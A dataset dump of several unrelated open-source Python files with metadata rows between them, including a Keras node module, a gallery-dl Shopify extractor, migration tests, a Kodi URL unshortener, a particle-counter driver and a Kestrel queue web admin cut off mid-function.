# If an element in the first call argument did not originate as a
# keras tensor and is a constant value, we save it using the format
# ['_CONSTANT_VALUE', -1, serializaed_tensor_or_python_constant]
# (potentially including serialized kwargs in an optional 4th argument
data = [_CONSTANT_VALUE, -1, _serialize_keras_tensor(t), kwargs]
return tf_utils.ListWrapper(data)
data = nest.map_structure(serialize_first_arg_tensor, inputs)
if (not nest.is_nested(data) and
not self.layer._preserve_input_structure_in_config):
data = [data]
data = tf_utils.convert_inner_node_data(data)
return data
#############################################################
# Properties for Backwards compatibility.
# These only check the first input argument
# As nodes are internal, they may be removed in the future.
#############################################################
@property
def input_tensors(self):
if self.is_input:
return [self.outputs] # Used in `Layer.input`.
return self.call_args[0]
@property
def output_tensors(self):
if self.is_input:
return [self.outputs] # Used in `Layer.input`.
return self.outputs
@property
def input_shapes(self):
input_shapes = nest.map_structure(backend.int_shape, self.input_tensors)
if len(input_shapes) == 1 and not self.is_input:
return input_shapes[0]
return input_shapes
@property
def output_shapes(self):
return nest.map_structure(backend.int_shape, self.output_tensors)
@property
def outbound_layer(self):
return self.layer
@property
def inbound_layers(self):
if self.is_input:
return []
inbound_layers = nest.map_structure(lambda t: t._keras_history.layer,
self.call_args[0])
return inbound_layers
class KerasHistory(
collections.namedtuple('KerasHistory',
['layer', 'node_index', 'tensor_index'])):
"""Tracks the Layer call that created a Tensor, for Keras Graph Networks.
During construction of Keras Graph Networks, this metadata is added to
each Tensor produced as the output of a Layer, starting with an
`InputLayer`. This allows Keras to track how each Tensor was produced, and
this information is later retraced by the `keras.engine.Network` class to
reconstruct the Keras Graph Network.
Attributes:
layer: The Layer that produced the Tensor.
node_index: The specific call to the Layer that produced this Tensor. Layers
can be called multiple times in order to share weights. A new node is
created every time a Layer is called.
tensor_index: The output index for this Tensor. Always zero if the Layer
that produced this Tensor only has one output. Nested structures of
Tensors are deterministically assigned an index via `nest.flatten`.
"""
# Added to maintain memory and performance characteristics of `namedtuple`
# while subclassing.
__slots__ = ()
def is_keras_tensor(obj):
return hasattr(obj, '_keras_history')
| apache-2.0 | -5,113,593,819,068,058,000 | 37.945205 | 80 | 0.66268 | false | 3.901201 | false | false | false |
mikf/gallery-dl | gallery_dl/extractor/shopify.py | 1 | 4365 | # -*- coding: utf-8 -*-
# Copyright 2019-2021 Mike Fährmann
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
"""Extractors for Shopify instances"""
from .common import BaseExtractor, Message
from .. import text
import re
class ShopifyExtractor(BaseExtractor):
"""Base class for Shopify extractors"""
basecategory = "shopify"
filename_fmt = "{product[title]}_{num:>02}_{id}.{extension}"
archive_fmt = "{id}"
def __init__(self, match):
BaseExtractor.__init__(self, match)
self.item_url = self.root + match.group(match.lastindex)
def items(self):
data = self.metadata()
yield Message.Directory, data
headers = {"X-Requested-With": "XMLHttpRequest"}
for url in self.products():
response = self.request(
url + ".json", headers=headers, fatal=False)
if response.status_code >= 400:
self.log.warning('Skipping %s ("%s: %s")',
url, response.status_code, response.reason)
continue
product = response.json()["product"]
del product["image"]
for num, image in enumerate(product.pop("images"), 1):
text.nameext_from_url(image["src"], image)
image.update(data)
image["product"] = product
image["num"] = num
yield Message.Url, image["src"], image
def metadata(self):
"""Return general metadata"""
return {}
def products(self):
"""Return an iterable with all relevant product URLs"""
BASE_PATTERN = ShopifyExtractor.update({
"fashionnova": {
"root": "https://www.fashionnova.com",
"pattern": r"(?:www\.)?fashionnova\.com",
},
"omgmiamiswimwear": {
"root": "https://www.omgmiamiswimwear.com"
},
})
class ShopifyCollectionExtractor(ShopifyExtractor):
"""Base class for collection extractors for Shopify based sites"""
subcategory = "collection"
directory_fmt = ("{category}", "{collection[title]}")
pattern = BASE_PATTERN + r"(/collections/[\w-]+)/?(?:$|[?#])"
test = (
("https://www.fashionnova.com/collections/mini-dresses", {
"range": "1-20",
"count": 20,
"archive": False,
}),
("https://www.fashionnova.com/collections/mini-dresses/?page=1"),
("https://www.fashionnova.com/collections/mini-dresses#1"),
("https://www.omgmiamiswimwear.com/collections/fajas"),
)
def metadata(self):
return self.request(self.item_url + ".json").json()
def products(self):
params = {"page": 1}
fetch = True
last = None
for pattern in (
r"/collections/[\w-]+/products/[\w-]+",
r"href=[\"'](/products/[\w-]+)",
):
search_re = re.compile(pattern)
while True:
if fetch:
page = self.request(self.item_url, params=params).text
urls = search_re.findall(page)
if len(urls) < 3:
if last:
return
fetch = False
break
fetch = True
for path in urls:
if last == path:
continue
last = path
yield self.root + path
params["page"] += 1
class ShopifyProductExtractor(ShopifyExtractor):
"""Base class for product extractors for Shopify based sites"""
subcategory = "product"
directory_fmt = ("{category}", "Products")
pattern = BASE_PATTERN + r"((?:/collections/[\w-]+)?/products/[\w-]+)"
test = (
("https://www.fashionnova.com/products/essential-slide-red", {
"pattern": r"https?://cdn\d*\.shopify.com/",
"count": 3,
}),
("https://www.omgmiamiswimwear.com/products/la-medusa-maxi-dress", {
"pattern": r"https://cdn\.shopify\.com/s/files/1/1819/6171/",
"count": 5,
}),
("https://www.fashionnova.com/collections/flats/products/name"),
)
def products(self):
return (self.item_url,)
| gpl-2.0 | 6,708,945,724,042,438,000 | 31.325926 | 76 | 0.541934 | false | 3.952899 | false | false | false |
sdispater/eloquent | tests/migrations/test_migrator.py | 1 | 8071 | # -*- coding: utf-8 -*-
import os
import glob
from flexmock import flexmock, flexmock_teardown
from .. import EloquentTestCase
from eloquent.migrations import Migrator, DatabaseMigrationRepository, Migration
from eloquent import DatabaseManager
from eloquent.connections import Connection
class MigratorTestCase(EloquentTestCase):
def tearDown(self):
flexmock_teardown()
def test_migrations_are_run_up_when_outstanding_migrations_exist(self):
resolver = flexmock(DatabaseManager)
resolver.should_receive('connection').and_return(None)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
g = flexmock(glob)
g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
os.path.join(os.getcwd(), '2_bar.py'),
os.path.join(os.getcwd(), '1_foo.py'),
os.path.join(os.getcwd(), '3_baz.py')
])
migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1)
migrator.get_repository().should_receive('log').once().with_args('2_bar', 1)
migrator.get_repository().should_receive('log').once().with_args('3_baz', 1)
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('up').once()
baz_mock = flexmock(MigrationStub())
baz_mock.should_receive('up').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock)
migrator.run(os.getcwd())
def test_up_migration_can_be_pretended(self):
resolver_mock = flexmock(DatabaseManager)
resolver_mock.should_receive('connection').and_return({})
resolver = flexmock(DatabaseManager({}))
connection = flexmock(Connection(None))
connection.should_receive('pretend').replace_with(lambda callback: callback(None))
resolver.should_receive('connection').with_args(None).and_return(connection)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
g = flexmock(glob)
g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
os.path.join(os.getcwd(), '2_bar.py'),
os.path.join(os.getcwd(), '1_foo.py'),
os.path.join(os.getcwd(), '3_baz.py')
])
migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1)
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('get_connection').once().and_return(None)
bar_mock.should_receive('up').once()
baz_mock = flexmock(MigrationStub())
baz_mock.should_receive('get_connection').once().and_return(None)
baz_mock.should_receive('up').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock)
migrator.run(os.getcwd(), True)
def test_nothing_is_done_when_no_migrations_outstanding(self):
resolver_mock = flexmock(DatabaseManager)
resolver_mock.should_receive('connection').and_return(None)
resolver = flexmock(DatabaseManager({}))
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
g = flexmock(glob)
g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
os.path.join(os.getcwd(), '1_foo.py')
])
migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
migrator.run(os.getcwd())
def test_last_batch_of_migrations_can_be_rolled_back(self):
resolver = flexmock(DatabaseManager)
resolver.should_receive('connection').and_return(None)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
foo_migration = MigrationStub('foo')
bar_migration = MigrationStub('bar')
migrator.get_repository().should_receive('get_last').once().and_return([
foo_migration,
bar_migration
])
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('down').once()
foo_mock = flexmock(MigrationStub())
foo_mock.should_receive('down').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock)
migrator.get_repository().should_receive('delete').once().with_args(bar_migration)
migrator.get_repository().should_receive('delete').once().with_args(foo_migration)
migrator.rollback(os.getcwd())
def test_rollback_migration_can_be_pretended(self):
resolver_mock = flexmock(DatabaseManager)
resolver_mock.should_receive('connection').and_return({})
resolver = flexmock(DatabaseManager({}))
connection = flexmock(Connection(None))
connection.should_receive('pretend').replace_with(lambda callback: callback(None))
resolver.should_receive('connection').with_args(None).and_return(connection)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
foo_migration = MigrationStub('foo')
bar_migration = MigrationStub('bar')
migrator.get_repository().should_receive('get_last').once().and_return([
foo_migration,
bar_migration
])
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('down').once()
foo_mock = flexmock(MigrationStub())
foo_mock.should_receive('down').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock)
migrator.rollback(os.getcwd(), True)
def test_nothing_is_rolled_back_when_nothing_in_repository(self):
resolver = flexmock(DatabaseManager)
resolver.should_receive('connection').and_return(None)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
migrator.get_repository().should_receive('get_last').once().and_return([])
migrator.rollback(os.getcwd())
class MigrationStub(Migration):
def __init__(self, migration=None):
self.migration = migration
def up(self):
pass
def down(self):
pass
def __getitem__(self, item):
return self.migration
| mit | 5,210,899,352,711,786,000 | 35.192825 | 103 | 0.566844 | false | 4.147482 | true | false | false |
Superzer0/pyRiverRaid | objects/mobs/generators/powerup_generators.py | 1 | 2120 | import random
from objects.globals.gamesettings import GameSettings
from objects.powerup import PowerUp
class PowerUpGenerator:
"""Base class for power ups generators"""
def __init__(self, player, imgResources, all_sprites, powerups):
self.player = player
self.imgResources = imgResources
self.all_sprites = all_sprites
self.power_ups = powerups
def generate(self):
"""base dummy implementation for genrating power up"""
pass
class ShieldGenerator(PowerUpGenerator):
"""Generates random shield"""
def generate(self):
"""Method used for generating shield, if created shield added to sprite context"""
if self.player.shield < 50 and random.random() > GameSettings.SHIELD_PROP:
shield = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups,
self.imgResources.POWER_UP_SHIELD)
self.power_ups.add(shield)
self.all_sprites.add(shield)
class GunGenerator(PowerUpGenerator):
"""Generates random gun"""
def generate(self):
"""Method used for generating gun, if created gun added to sprite context"""
if random.random() > GameSettings.GUN_PROP:
gun = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups,
self.imgResources.POWER_UP_GUN)
self.power_ups.add(gun)
self.all_sprites.add(gun)
class FuelGenerator(PowerUpGenerator):
"""Generates random fuel pack"""
def generate(self):
"""Method used for generating fuel, if created fuel added to sprite context"""
count = len(list(filter(lambda x: x.type == self.imgResources.POWER_UP_FUEL, self.power_ups)))
if count < 2 and self.player.fuel < 80 and random.random() > GameSettings.FUEL_PROP:
fuel = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups,
self.imgResources.POWER_UP_FUEL)
self.power_ups.add(fuel)
self.all_sprites.add(fuel)
| mit | -8,526,851,652,054,712,000 | 39.769231 | 109 | 0.64717 | false | 3.918669 | false | false | false |
sein-tao/StockAnalysis | dump_flow.py | 1 | 2209 | # -*- coding: utf-8 -*-
"""
Dump tdx_flow files to pickle
Created on Sun Jul 26 18:51:24 2015
@author: Sein Tao
@email: [email protected]
"""
# import sys
# sys.path.append("..")
import os
import pickle
import datetime
import dateutil.relativedelta
from parse_flow import parse_tdx_flow, FlowRecord
datadir="D:\Personal\Finnance\Stock\Flow"
def dump_flow(month_start, month_end, outfile, datadir=datadir):
"""Dump tdx_flow files to pickle"""
str2date = lambda x: datetime.datetime.strptime(x, '%Y%m')
date2str = lambda x: datetime.datetime.strftime(x, '%Y%m')
one_month = dateutil.relativedelta.relativedelta(months=1)
start, end = str2date(month_start), str2date(month_end)
if start > end:
raise ValueError("start month should be less than end month")
recs = []
current = start
while current <= end:
file = os.path.join(datadir, 'flow'+date2str(current)+".xls")
recs.extend(parse_tdx_flow(file))
current += one_month
with open(outfile, 'wb') as fh:
pickle.dump(recs, fh)
def dump2txt(dump_file, out_file):
ih = open(dump_file, 'rb')
data = pickle.load(ih)
ih.close()
oh = open(out_file, 'w')
oh.write("#" + "\t".join(FlowRecord.Raw._fields) + "\n")
for rec in data:
oh.write("\t".join(rec.raw))
oh.write("\n")
oh.close()
def load_flow(dump_file):
return pickle.load(open(dump_file, 'rb'))
if __name__ == '__main__':
data_file = os.path.join(datadir, '2014.pickle')
#dump_flow('201405', '201412', data_file)
#data = pickle.load(open(data_file, 'rb'))
#dump2txt(data_file, os.path.join(datadir,'2014.txt'))
import unittest
class Test(unittest.TestCase):
def setUp(self):
self.ref = os.path.join(datadir, '2014.pickle')
self.tmp = "tmp/flow.pickle"
def test_dump(self):
import filecmp
dump_flow('201405', '201412', self.tmp)
self.assertTrue(filecmp.cmp(self.ref, self.tmp))
def test_load(self):
self.assertEqual(load_flow(self.ref), load_flow(self.tmp))
from util import runTestCase
runTestCase(Test)
| gpl-2.0 | -5,176,967,298,923,372,000 | 29.694444 | 70 | 0.6134 | false | 3.215429 | true | false | false |
codeforamerica/mdc-feedback | feedback/reports/models.py | 1 | 2121 | # -*- coding: utf-8 -*-
import arrow
from flask import (
render_template, current_app,
url_for
)
from feedback.database import (
Column, db, Model
)
from feedback.utils import send_email
class Monthly(Model):
''' The monthly report model - this only contains
one field: a string of e-mails separated by commas
if necessary.
'''
__tablename__ = 'monthly-report'
id = Column(db.Integer, primary_key=True, index=True)
email_list = Column(db.String(200), nullable=True)
def __repr__(self):
return '<Monthly(id:{0}, emails:{1})>'.format(
self.id,
self.email_list)
def send_report(self):
''' From an instance of the Monthly model, send
out an e-mail saying that this months monthly
report is ready. This gets pinged from a server
task every month through Heroku. In theory.
'''
if self.email_list is None:
subj = 'Permitting Inspection Center Monthly Status Report'
current_app.logger.info(
'NO-EMAIL-ADDRESS | Subject: {}'.format(subj))
else:
subj = 'Permitting Inspection Center Monthly Status Report - {}'
from_email = current_app.config.get('ADMIN_EMAIL')
last_month = arrow.utcnow().replace(months=-1)
date_start, date_end = last_month.span('month')
date_header = date_start.format('MMMM, YYYY')
year = last_month.format('YYYY')
month = last_month.format('MM')
report = url_for(
'reports.overview', _external=True,
year=year, month=month)
send_email(
subj.format(date_header),
from_email,
self.email_list,
render_template('email/monthly_notification.txt',
date_header=date_header,
report=report),
render_template('email/monthly_notification.html',
date_header=date_header,
report=report))
| mit | 11,070,799,657,152,250 | 33.209677 | 76 | 0.554455 | false | 4.2 | false | false | false |
mathemage/h2o-3 | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2oinit.py | 2 | 2140 | from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
from h2o.utils.typechecks import assert_is_type
from h2o.exceptions import H2OConnectionError
def h2oinit():
"""
Python API test: h2o.init(url=None, ip=None, port=None, https=None, insecure=None, username=None, password=None,
cookies=None, proxy=None, start_h2o=True, nthreads=-1, ice_root=None, enable_assertions=True,
max_mem_size=None, min_mem_size=None, strict_version_check=None, **kwargs)
"""
start_h2o = False
strict_version_check = False
print("Testing h2o.init() command...")
try:
h2o.init(start_h2o=start_h2o)
print("h2o.init() command works!")
except Exception as e: # some errors are okay like version mismatch
print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0]))
assert_is_type(e, H2OConnectionError)
try:
h2o.init(strict_version_check=strict_version_check, start_h2o=start_h2o)
except Exception as e:
print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0]))
assert_is_type(e, H2OConnectionError)
# try to join a cluster and test out various command arguments
ipS = "127.16.2.27"
portS = "54321"
nthread = 2
max_mem_size=10
min_mem_size=3
try:
h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, min_mem_size=min_mem_size,
start_h2o=start_h2o, strict_version_check=strict_version_check)
print("Command h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, "
"min_mem_size=min_mem_size,start_h2o=start_h2o, strict_version_check=strict_version_check) works!")
except Exception as e: # make sure correct error message is received
print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0]))
assert_is_type(e, H2OConnectionError)
if __name__ == "__main__":
pyunit_utils.standalone_test(h2oinit)
else:
h2oinit()
| apache-2.0 | 6,204,695,707,061,553,000 | 40.960784 | 116 | 0.662617 | false | 3.092486 | false | false | false |
googleapis/googleapis-gen | google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/ad_schedule_view.py | 1 | 1328 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v7.resources',
marshal='google.ads.googleads.v7',
manifest={
'AdScheduleView',
},
)
class AdScheduleView(proto.Message):
r"""An ad schedule view summarizes the performance of campaigns
by AdSchedule criteria.
Attributes:
resource_name (str):
Output only. The resource name of the ad schedule view.
AdSchedule view resource names have the form:
``customers/{customer_id}/adScheduleViews/{campaign_id}~{criterion_id}``
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 372,957,407,092,470,800 | 27.869565 | 84 | 0.683735 | false | 4 | false | false | false |
Seko34/Kodi-Development | script.module.core.ultrastream/resources/lib/unshortenurl.py | 1 | 6570 | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------
'''
Created on 02 Jan 2016
@author: Seko
@summary: Class for unshorten link
'''
#---------------------------------------------------------------------
# ____________________ I M P O R T ____________________
import re
import urllib
import urllib2
import copy
import traceback
import cookielib
import time
import json
import xbmcgui
import constant
import webUtil
from urlparse import urlsplit
# ____________________ C L A S S ____________________
class UnshortenUrl(object):
PATTERN_VIIDME = r'viid\.me'
PATTERN_CLLKME = r'cllkme\.com'
PATTERN_SHST = r'sh\.st'
PATTERN_SHST_WITH_FREEZE = r'http://sh.st/freeze/'
PATTERN_DPSTREAM = r'https://www.dpstream.net/external_link/'
def __init__(self):
"""
Constructor
"""
self.HEADER_CFG = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive'}
self.cookiejar = cookielib.CookieJar()
self.urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar),webUtil.SmartRedirectHandler())
def unshortUrl(self,url):
"""
Method to unshort url
@param url: the url to unshort
@return the final url
"""
newUrl = self._unshort(url)
while url != newUrl:
url = newUrl
newUrl = self._unshort(url)
return newUrl
def _unshort(self,url):
"""
Method to unshort url
@param url: the url to unshort
@return the final url
"""
domain = urlsplit(url).netloc
if not domain:
return url
if re.search(self.PATTERN_VIIDME,url):
return self._unshortshst(url,'viid.me')
if re.search(self.PATTERN_CLLKME,url):
return self._unshortshst(url,'cllkme.com')
elif re.search(self.PATTERN_SHST_WITH_FREEZE,url):
return self._unshortshst(url[20:])
elif re.search(self.PATTERN_SHST,url):
return self._unshortshst(url)
elif re.search(self.PATTERN_DPSTREAM,url):
return self._unshortdpstream(url)
else:
return url
def _unshortshst(self,url,host='sh.st'):
"""
Method to unshort Viid.me url
@param url: the url to unshort
@return the final url
"""
if url.endswith('/'):
url = url[:-1]
request = urllib2.Request(url, headers=self.HEADER_CFG)
response = None
try:
response = self.urlOpener.open(request)
if response is not None and response.getcode() == 200:
content = response.read()
sessionPattern = re.compile('(.*)(sessionId: ")(.{1,50})(",)(.*)',re.DOTALL)
match = sessionPattern.match(content)
if match is not None:
# __ Get adSessionId
adSessionId = match.group(3)
# __ Construct url
urlEnd = 'http://'+host+'/shortest-url/end-adsession?'
data1 = {'adSessionId':adSessionId,'callback':'c'}
dataStr = urllib.urlencode(data1)
urlEnd+=dataStr
# ___ Define headers
headers1 = copy.copy(self.HEADER_CFG)
headers1["Host"] = host
headers1["Referer"] = url
# ___ Sleep 5 seconds
currentSecond = 5
dp = xbmcgui.DialogProgress()
dp.create(constant.__addon__.getLocalizedString(33057),str(currentSecond)+' secondes')
while currentSecond > 0:
currentSecond = currentSecond-1
dp.update((5-currentSecond)*20, str(currentSecond)+' secondes')
time.sleep(1)
dp.close()
dp = None
# ___ Request the final url
requestEnd = urllib2.Request(urlEnd,headers=headers1)
responseEnd = None
try:
responseEnd = self.urlOpener.open(requestEnd)
except urllib2.HTTPError as e:
responseEnd = e
except:
traceback.print_exc()
if responseEnd is not None and responseEnd.getcode() == 200:
# ___ Get the destination url
contentEnd = responseEnd.read()
jsonResult = json.loads(contentEnd[6:-2].decode('utf-8'))
return jsonResult['destinationUrl']
except:
traceback.print_exc()
return url
def _unshortdpstream(self,url):
"""
Method to unshort dpstream url
"""
if url.endswith('/'):
url = url[:-1]
print url
request = urllib2.Request(url, headers=self.HEADER_CFG)
response = None
try:
response = self.urlOpener.open(request)
if response is not None and response.getcode() == 200:
content = response.read()
index = content.find('window.open')
if index > 0:
getUrlPattern = re.compile("(.*)(window.open\(\\\\')(.*)(\\\\',\\\\'_blank\\\\')(.*)",re.MULTILINE)
match = getUrlPattern.match(content[index:])
if match is not None:
return match.group(3)
else:
print content
except:
traceback.print_exc()
return url | gpl-3.0 | -4,804,087,580,398,559,000 | 36.887574 | 154 | 0.4586 | false | 4.503084 | false | false | false |
JohnDMcMaster/uvscada | uvscada/dc1100.py | 1 | 4669 | '''
uvscada
Copyright 2012 John McMaster <[email protected]>
Licensed under the terms of the LGPL V3 or later, see COPYING for details
'''
'''
I suspect all DC1100 units have the PC interface internally and just aren't brought outside
Not sure how hard that is to do yourself though
Also the manual hints that there is no internal difference between the pro and regular units
The only difference is the calibration
'''
import serial
#import uvscada.serial
import re
'''
Small particles are displayed on the left
Large particles are didplayed on the right
Regular
Small: Detection limit of 1 micron (um)
Large: ~5 um
Pro
Small: 0.5 um
Large: 2.5 um
Values are scaled to represent concentration of particles in 0.01 cubic foot of sampled air
Since this object only reports density it doesn't matter what these actual size values are
'''
class Measurement:
# Qualities
VERY_POOR = 1
POOR = 2
FAIR = 3
GOOD = 4
VERY_GOOD = 5
EXCELLENT = 6
@staticmethod
def quality_str(q):
vals = ['VERY_POOR', 'POOR','FAIR','GOOD','VERY_GOOD','EXCELLENT']
for v in vals:
if q == eval('Measurement.' + v):
return v
return None
def __init__(self, small, large):
self.small = small
self.large = large
def small_cpf(self):
return self.small * self.cpf_conversion()
def large_cpf(self):
return self.large * self.cpf_conversion()
def cpf_conversion(self):
# Convert particles / (0.01 ft**3) to particles / ft**3
# (as used in FED-STD-209E)
return 1 / 0.01
def small_cpm(self):
return self.small * self.cpm_conversion()
def large_cpm(self):
return self.large * self.cpm_conversion()
def cpm_conversion(self):
# Convert particles / (0.01 ft**3) to particles / m**3
# 3531.466672149
return 1 / (0.01 * ((12.0 * 25.4 / 1000.0)**3))
def valid(self):
# Some arbitrary high limits to detect a bad data parse
if self.small > 100000 or self.small < 0:
return False
if self.large > 100000 or self.large < 0:
return False
# I'm not sure if this is actually true
return self.small > self.large
@staticmethod
def parse(s):
# Reading should be
# 1231,422
parsed = re.match('([0-9]+)[,]([0-9]+)', s)
if not parsed:
return None
return Measurement(int(parsed.group(1)), int(parsed.group(2)))
class DC1100:
def __init__(self, device):
#if device is None:
# device = uvscada.serial.get_device()
self.device = device
self.serial = serial.Serial(self.device, 9600, timeout=1)
self.last_meas = None
# Start out
# spike
# and then drop back
self.test_meas = []
#self.test_meas = [(100, 10), (100, 10), (100, 10), (100, 10), (1000, 100), (1000, 100), (1000, 100), (100, 10), (100, 10), (100, 10), (100, 10), (100, 10)]
# Don't return until a measurement is availible
def wait_meas(self, require_valid = False):
if len(self.test_meas) > 0:
m = Measurement(*self.test_meas[0])
self.test_meas = self.test_meas[1:]
self.last_meas = m
return m
while True:
m = self.meas()
if m and ((not require_valid) or m.valid()):
return m
# One Measurement per minute
def meas(self):
# Read until newline
s = ''
while True:
c = self.serial.read()
if c == '\n':
break
s += c
self.last_meas = Measurement.parse(s)
return self.last_meas
def quality(self):
'''
manual page 12 definition
Although manual does not say these are small particle counts the back of the unit does
'''
if self.last_meas == None:
return None
return self.meas_quality(self.last_meas)
def quality_str(self):
return Measurement.quality_str(self.quality())
def meas_quality(self, meas):
'''
manual page 12 definition
Although manual does not say these are small particle counts the back of the unit does
'''
small = meas.small
if small >= 1000:
return Measurement.VERY_POOR
elif small >= 350:
return Measurement.POOR
elif small >= 100:
return Measurement.FAIR
elif small >= 50:
return Measurement.GOOD
elif small >= 25:
return Measurement.VERY_GOOD
elif small >= 0:
return Measurement.EXCELLENT
else:
raise Exception('Malformed measurement')
class DC1100Pro(DC1100):
def __init__(self, dev):
DC1100.__init__(self, dev)
def meas_quality(self, meas):
small = meas.small
if small >= 3000:
return Measurement.VERY_POOR
elif small >= 1050:
return Measurement.POOR
elif small >= 300:
return Measurement.FAIR
elif small >= 150:
return Measurement.GOOD
# 100 would be barely passing class 10k cleanroom
elif small >= 75:
return Measurement.VERY_GOOD
elif small >= 0:
return Measurement.EXCELLENT
else:
raise Exception('Malformed measurement')
| bsd-2-clause | -6,698,238,722,773,940,000 | 23.703704 | 158 | 0.674877 | false | 3.0181 | true | false | false |
matterkkila/kestrelweb | kestrelweb/main.py | 1 | 4019 |
import logging.config
import local_settings; logging.config.fileConfig(local_settings.logging_config)
import dream
import kestrel_actions
import util
App = dream.App()
@App.expose('/')
def home(request):
return dream.Response(body=util.template('index.html'), content_type='text/html')
@App.expose('/ajax/action.json')
def ajax_action(request):
callback = request.params['callback'] if 'callback' in request.params else None
action = request.params['action'] if 'action' in request.params else None
server_queue = request.params.getall('server') if 'server' in request.params else []
data = {}
status = 200
if len(server_queue) == 0:
data['error'] = 'Missing server or queue name'
status = 500
elif action in ['flush', 'delete', 'peek', 'flush_all', 'reload', 'shutdown']:
actions = []
for _sq in server_queue:
(server, queue) = _sq.split(',', 1) if _sq.count(',') else (_sq, None)
if action in ['flush', 'delete', 'peek']:
actions.append((server, [queue]))
else:
actions.append((server, []))
data['results'] = kestrel_actions.action(action, actions)
else:
data['error'] = 'Invalid action'
status = 500
return dream.JSONResponse(callback=callback, body=data, status=status)
@App.expose('/ajax/stats.json')
def ajax_stats(request):
callback = request.params['callback'] if 'callback' in request.params else None
servers = request.params['servers'] if 'servers' in request.params else None
qsort = request.params['qsort'] if 'qsort' in request.params else None
qreverse = int(request.params['qreverse']) if 'qreverse' in request.params else 0
qfilter = request.params['qfilter'] if 'qfilter' in request.params else None
response = {}
if servers:
server_stats = dict([(server, None) for server in servers.split(',')])
queue_stats = []
stats_response = kestrel_actions.stats(server_stats.iterkeys())
if stats_response is not None:
for server, _data in stats_response.iteritems():
server_stats[server] = _data['server']
queue_stats.extend([
dict(server=server, queue=queue, **qstats)
for queue, qstats in _data['queues'].iteritems()
if util.queue_filter(qfilter, queue, qstats)
])
response['servers'] = [
{'server': server, 'stats': _stats}
for server, _stats in server_stats.iteritems()
]
response['servers'].sort(key=util.QUEUE_SORT['server'])
response['queues'] = queue_stats
response['queues'].sort(key=util.QUEUE_SORT['server'])
response['queues'].sort(key=util.QUEUE_SORT[qsort] if qsort in util.QUEUE_SORT else util.QUEUE_SORT['name'], reverse=qreverse)
return dream.JSONResponse(callback=callback, body=response)
@App.expose('/ajax/config.json')
def templates(request):
callback = request.params['callback'] if 'callback' in request.params else None
return dream.JSONResponse(callback=callback, body={
'servers': [{'server': server} for server in local_settings.servers],
'templates': {
'content': util.template('content.html'),
'servers': util.template('servers.html'),
'queues': util.template('queues.html'),
}
})
@App.expose('/static/<filepath:.*>')
def static(request, filepath):
body = ''
content_type = 'test/plain'
try:
